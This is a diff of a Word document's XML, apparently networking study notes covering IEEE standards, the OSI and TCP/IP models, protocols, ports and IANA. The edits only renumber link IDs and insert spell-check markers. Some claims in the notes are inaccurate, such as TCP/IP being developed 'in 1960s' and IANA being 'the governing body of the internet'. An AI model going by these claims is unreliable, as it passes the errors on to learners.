                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5246,7 +5642,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId66" w:tooltip="IEEE 1233" w:history="1">
+            <w:hyperlink r:id="rId65" w:tooltip="IEEE 1233" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5306,7 +5702,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId67" w:tooltip="IEEE 1275" w:history="1">
+            <w:hyperlink r:id="rId66" w:tooltip="IEEE 1275" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5366,7 +5762,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId68" w:tooltip="IEEE 1284" w:history="1">
+            <w:hyperlink r:id="rId67" w:tooltip="IEEE 1284" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5395,7 +5791,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId69" w:tooltip="Parallel port" w:history="1">
+            <w:hyperlink r:id="rId68" w:tooltip="Parallel port" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5430,7 +5826,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId70" w:tooltip="IEEE P1363" w:history="1">
+            <w:hyperlink r:id="rId69" w:tooltip="IEEE P1363" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5459,7 +5855,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId71" w:tooltip="Public key cryptography" w:history="1">
+            <w:hyperlink r:id="rId70" w:tooltip="Public key cryptography" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5494,7 +5890,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId72" w:tooltip="IEEE 1394" w:history="1">
+            <w:hyperlink r:id="rId71" w:tooltip="IEEE 1394" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5529,7 +5925,25 @@
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
-              <w:t>Serial bus – "FireWire", "i.Link"</w:t>
+              <w:t>Serial bus – "FireWire", "</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>i.Link</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>"</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5554,7 +5968,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId73" w:tooltip="IEEE 1471" w:history="1">
+            <w:hyperlink r:id="rId72" w:tooltip="IEEE 1471" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5583,7 +5997,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId74" w:tooltip="Software architecture" w:history="1">
+            <w:hyperlink r:id="rId73" w:tooltip="Software architecture" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5603,7 +6017,7 @@
               </w:rPr>
               <w:t xml:space="preserve"> / </w:t>
             </w:r>
-            <w:hyperlink r:id="rId75" w:tooltip="System architecture" w:history="1">
+            <w:hyperlink r:id="rId74" w:tooltip="System architecture" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5638,7 +6052,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId76" w:tooltip="IEEE 1541" w:history="1">
+            <w:hyperlink r:id="rId75" w:tooltip="IEEE 1541" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5667,7 +6081,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId77" w:tooltip="Binary prefix" w:history="1">
+            <w:hyperlink r:id="rId76" w:tooltip="Binary prefix" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5702,7 +6116,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId78" w:tooltip="IEEE 1584" w:history="1">
+            <w:hyperlink r:id="rId77" w:tooltip="IEEE 1584" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5739,7 +6153,7 @@
               </w:rPr>
               <w:t xml:space="preserve">Guide for Performing </w:t>
             </w:r>
-            <w:hyperlink r:id="rId79" w:tooltip="Arc Flash" w:history="1">
+            <w:hyperlink r:id="rId78" w:tooltip="Arc Flash" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5782,7 +6196,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId80" w:tooltip="IEEE 1588" w:history="1">
+            <w:hyperlink r:id="rId79" w:tooltip="IEEE 1588" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5842,7 +6256,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId81" w:tooltip="IEEE P1619" w:history="1">
+            <w:hyperlink r:id="rId80" w:tooltip="IEEE P1619" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5902,7 +6316,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId82" w:tooltip="IEEE 1666 (page does not exist)" w:history="1">
+            <w:hyperlink r:id="rId81" w:tooltip="IEEE 1666 (page does not exist)" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5937,7 +6351,25 @@
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
-              <w:t>IEEE Standard for Standard SystemC Language Reference Manual</w:t>
+              <w:t xml:space="preserve">IEEE Standard for Standard </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>SystemC</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> Language Reference Manual</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5962,7 +6394,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId83" w:tooltip="IEEE 1667" w:history="1">
+            <w:hyperlink r:id="rId82" w:tooltip="IEEE 1667" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6022,7 +6454,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId84" w:tooltip="Unified Power Format" w:history="1">
+            <w:hyperlink r:id="rId83" w:tooltip="Unified Power Format" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6051,7 +6483,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId85" w:tooltip="Unified Power Format" w:history="1">
+            <w:hyperlink r:id="rId84" w:tooltip="Unified Power Format" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6085,7 +6517,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId86" w:tooltip="IEEE 1849" w:history="1">
+            <w:hyperlink r:id="rId85" w:tooltip="IEEE 1849" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6120,7 +6552,25 @@
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
-              <w:t>IEEE Standard for eXtensible Event Stream (XES) for Achieving Interoperability in Event Logs and Event Streams</w:t>
+              <w:t xml:space="preserve">IEEE Standard for </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>eXtensible</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> Event Stream (XES) for Achieving Interoperability in Event Logs and Event Streams</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6161,7 +6611,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId87" w:tooltip="IEEE 1855" w:history="1">
+            <w:hyperlink r:id="rId86" w:tooltip="IEEE 1855" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6196,7 +6646,25 @@
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
-              <w:t>IEEE Standard for Fuzzy Markup Language</w:t>
+              <w:t xml:space="preserve">IEEE Standard for Fuzzy </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>Markup</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> Language</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6236,7 +6704,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId88" w:tooltip="IEEE 1901" w:history="1">
+            <w:hyperlink r:id="rId87" w:tooltip="IEEE 1901" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6273,7 +6741,7 @@
               </w:rPr>
               <w:t xml:space="preserve">Broadband over </w:t>
             </w:r>
-            <w:hyperlink r:id="rId89" w:tooltip="Power line communication" w:history="1">
+            <w:hyperlink r:id="rId88" w:tooltip="Power line communication" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6323,7 +6791,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId90" w:tooltip="IEEE P1906.1" w:history="1">
+            <w:hyperlink r:id="rId89" w:tooltip="IEEE P1906.1" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6398,7 +6866,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId91" w:tooltip="IEEE 2600 (page does not exist)" w:history="1">
+            <w:hyperlink r:id="rId90" w:tooltip="IEEE 2600 (page does not exist)" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6473,7 +6941,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId92" w:tooltip="IEEE 12207" w:history="1">
+            <w:hyperlink r:id="rId91" w:tooltip="IEEE 12207" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6502,7 +6970,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId93" w:tooltip="Information Technology" w:history="1">
+            <w:hyperlink r:id="rId92" w:tooltip="Information Technology" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6560,7 +7028,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId94" w:tooltip="IEEE Switchgear Committee (page does not exist)" w:history="1">
+            <w:hyperlink r:id="rId93" w:tooltip="IEEE Switchgear Committee (page does not exist)" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6646,12 +7114,25 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>There are few standard ports in the system . All of them can be accessed at :</w:t>
-      </w:r>
+        <w:t xml:space="preserve">There are few standard ports in the </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>system .</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> All of them can be accessed </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>at :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:hyperlink r:id="rId95" w:history="1">
+      <w:hyperlink r:id="rId94" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -7002,7 +7483,23 @@
         <w:t>OSI Model</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> we just looked at is just a reference/logical model. It was designed to describe the functions of the communication system by dividing the communication procedure into smaller and simpler components. But when we talk about the TCP/IP model, it was designed and developed by Department of Defense (DoD) in 1960s and is based on standard protocols. It stands for Transmission Control Protocol/Internet Protocol. The </w:t>
+        <w:t xml:space="preserve"> we just looked at is just a reference/logical model. It was designed to describe the functions of the communication system by dividing the communication procedure into smaller and simpler components. But when we talk about the TCP/IP model, it was designed and developed by Department of </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Defense</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>DoD</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">) in 1960s and is based on standard protocols. It stands for Transmission Control Protocol/Internet Protocol. The </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7068,8 +7565,13 @@
         <w:pStyle w:val="NormalWeb"/>
       </w:pPr>
       <w:r>
-        <w:t>The diagrammatic comparison of the TCP/IP and OSI model is as follows :</w:t>
-      </w:r>
+        <w:t xml:space="preserve">The diagrammatic comparison of the TCP/IP and OSI model is as </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>follows :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7097,7 +7599,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId96">
+                    <a:blip r:embed="rId95">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -7176,8 +7678,13 @@
         <w:pStyle w:val="NormalWeb"/>
       </w:pPr>
       <w:r>
-        <w:t>This layer parallels the functions of OSI’s Network layer. It defines the protocols which are responsible for logical transmission of data over the entire network. The main protocols residing at this layer are :</w:t>
-      </w:r>
+        <w:t xml:space="preserve">This layer parallels the functions of OSI’s Network layer. It defines the protocols which are responsible for logical transmission of data over the entire network. The main protocols residing at this layer </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>are :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7194,8 +7701,13 @@
         <w:t>IP –</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> stands for Internet Protocol and it is responsible for delivering packets from the source host to the destination host by looking at the IP addresses in the packet headers. IP has 2 versions:</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> stands for Internet Protocol and it is responsible for delivering packets from the source host to the destination host by looking at the IP addresses in the packet headers. IP has 2 versions</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>:</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:br/>
         <w:t>IPv4 and IPv6. IPv4 is the one that most of the websites are using currently. But IPv6 is growing as the number of IPv4 addresses are limited in number when compared to the number of users.</w:t>
@@ -7234,7 +7746,23 @@
         <w:t>ARP –</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> stands for Address Resolution Protocol. It’s job is to find the hardware address of a host from a known IP address. ARP has several types: Reverse ARP, Proxy ARP, Gratituous ARP and Inverse ARP. </w:t>
+        <w:t xml:space="preserve"> stands for Address Resolution Protocol. </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>It’s</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> job is to find the hardware address of a host from a known IP address. ARP has several types: Reverse ARP, Proxy ARP, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Gratituous</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> ARP and Inverse ARP. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7250,8 +7778,13 @@
         <w:pStyle w:val="NormalWeb"/>
       </w:pPr>
       <w:r>
-        <w:t>This layer is analogous to the transport layer of the OSI model. It is responsible for end-to-end communication and error-free delivery of data. It shields the upper-layer applications from the complexities of data. The two main protocols present in this layer are :</w:t>
-      </w:r>
+        <w:t xml:space="preserve">This layer is analogous to the transport layer of the OSI model. It is responsible for end-to-end communication and error-free delivery of data. It shields the upper-layer applications from the complexities of data. The two main protocols present in this layer </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>are :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7302,9 +7835,17 @@
         <w:pStyle w:val="NormalWeb"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">This layer performs the functions of top three layers of the OSI model: Application, Presentation and Session Layer. It is responsible for node-to-node communication and controls user-interface specifications. Some of the protocols present in this layer are : HTTP, HTTPS, FTP, TFTP, Telnet, SSH, SMTP, SNMP, NTP, DNS, DHCP, NFS, X Window, LPD. Have a look at </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId97" w:history="1">
+        <w:t xml:space="preserve">This layer performs the functions of top three layers of the OSI model: Application, Presentation and Session Layer. It is responsible for node-to-node communication and controls user-interface specifications. Some of the protocols present in this layer </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>are :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> HTTP, HTTPS, FTP, TFTP, Telnet, SSH, SMTP, SNMP, NTP, DNS, DHCP, NFS, X Window, LPD. Have a look at </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId96" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -7313,7 +7854,15 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t xml:space="preserve"> for some information about these protocols. Protocols other than those present in the linked article are : </w:t>
+        <w:t xml:space="preserve"> for some information about these protocols. Protocols other than those present in the linked article </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>are :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7332,7 +7881,15 @@
         <w:t>HTTP and HTTPS –</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> HTTP stands for Hyper-text transfer protocol. It is used by the World Wide Web to manage communications between web browsers and servers. HTTPS stands for HTTP-Secure. It is a combination of HTTP with SSL(Secure Socket Layer). It is efficient in cases where the browser need to fill out forms, sign in, authenticate and carry out bank transactions.</w:t>
+        <w:t xml:space="preserve"> HTTP stands for Hyper-text transfer protocol. It is used by the World Wide Web to manage communications between web browsers and servers. HTTPS stands for HTTP-Secure. It is a combination of HTTP with </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>SSL(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>Secure Socket Layer). It is efficient in cases where the browser need to fill out forms, sign in, authenticate and carry out bank transactions.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7387,8 +7944,13 @@
           <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
         </w:pBdr>
       </w:pPr>
-      <w:r>
-        <w:t>Headers(TCP,OSI,IPV4 and IPV6)</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Headers(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>TCP,OSI,IPV4 and IPV6)</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -7439,7 +8001,7 @@
             <o:lock v:ext="edit" aspectratio="t"/>
           </v:shapetype>
           <v:shape id="_x0000_i1025" type="#_x0000_t75" style="width:451.5pt;height:221.25pt">
-            <v:imagedata r:id="rId98" o:title="Screenshot-2018-4-27 TCP IP Reference Nmap Network Scanning(2)"/>
+            <v:imagedata r:id="rId97" o:title="Screenshot-2018-4-27 TCP IP Reference Nmap Network Scanning(2)"/>
             <v:shadow opacity=".5"/>
           </v:shape>
         </w:pict>
@@ -7480,7 +8042,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId99">
+                    <a:blip r:embed="rId98">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -7553,7 +8115,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId100">
+                    <a:blip r:embed="rId99">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -7610,7 +8172,7 @@
       <w:r>
         <w:pict>
           <v:shape id="_x0000_i1026" type="#_x0000_t75" style="width:451.5pt;height:149.25pt">
-            <v:imagedata r:id="rId101" o:title="Screenshot-2018-4-27 TCP IP Reference Nmap Network Scanning(1)"/>
+            <v:imagedata r:id="rId100" o:title="Screenshot-2018-4-27 TCP IP Reference Nmap Network Scanning(1)"/>
           </v:shape>
         </w:pict>
       </w:r>
@@ -7660,7 +8222,15 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>There are  a total of 65536 ports available. Where one port can be used by different service and vice-versa.</w:t>
+        <w:t xml:space="preserve">There </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>are  a</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> total of 65536 ports available. Where one port can be used by different service and vice-versa.</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -7768,19 +8338,51 @@
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
-        <w:t>The IANA</w:t>
-      </w:r>
-      <w:r>
-        <w:t>[Internet Assigned Number Authority]</w:t>
+        <w:t xml:space="preserve">The </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>IANA</w:t>
+      </w:r>
+      <w:r>
+        <w:t>[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>Internet Assigned Number Authority]</w:t>
       </w:r>
     </w:p>
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">The IANA is the governing body of the internet. It is this body that maintains the IP addresses all over the world. Now since it not possible to control the whole world with a single organisation the IANA has subdivisions which are responsible for the internet at specific parts of the world . There are a total of 5 divisions or to says 5 sub- organisations of IANA. </w:t>
-      </w:r>
-      <w:r>
-        <w:t>These sub divisions are called as RIR(s)[Regional internet registry]. The different subdivisions and the areas covered is given in the picture given below.</w:t>
+        <w:t xml:space="preserve">The IANA is the governing body of the internet. It is this body that maintains the IP addresses all over the world. Now since it not possible to control the whole world with a single organisation the IANA has subdivisions which are responsible for the internet at specific parts of the </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>world .</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> There are a total of 5 divisions or to </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>says</w:t>
+      </w:r>
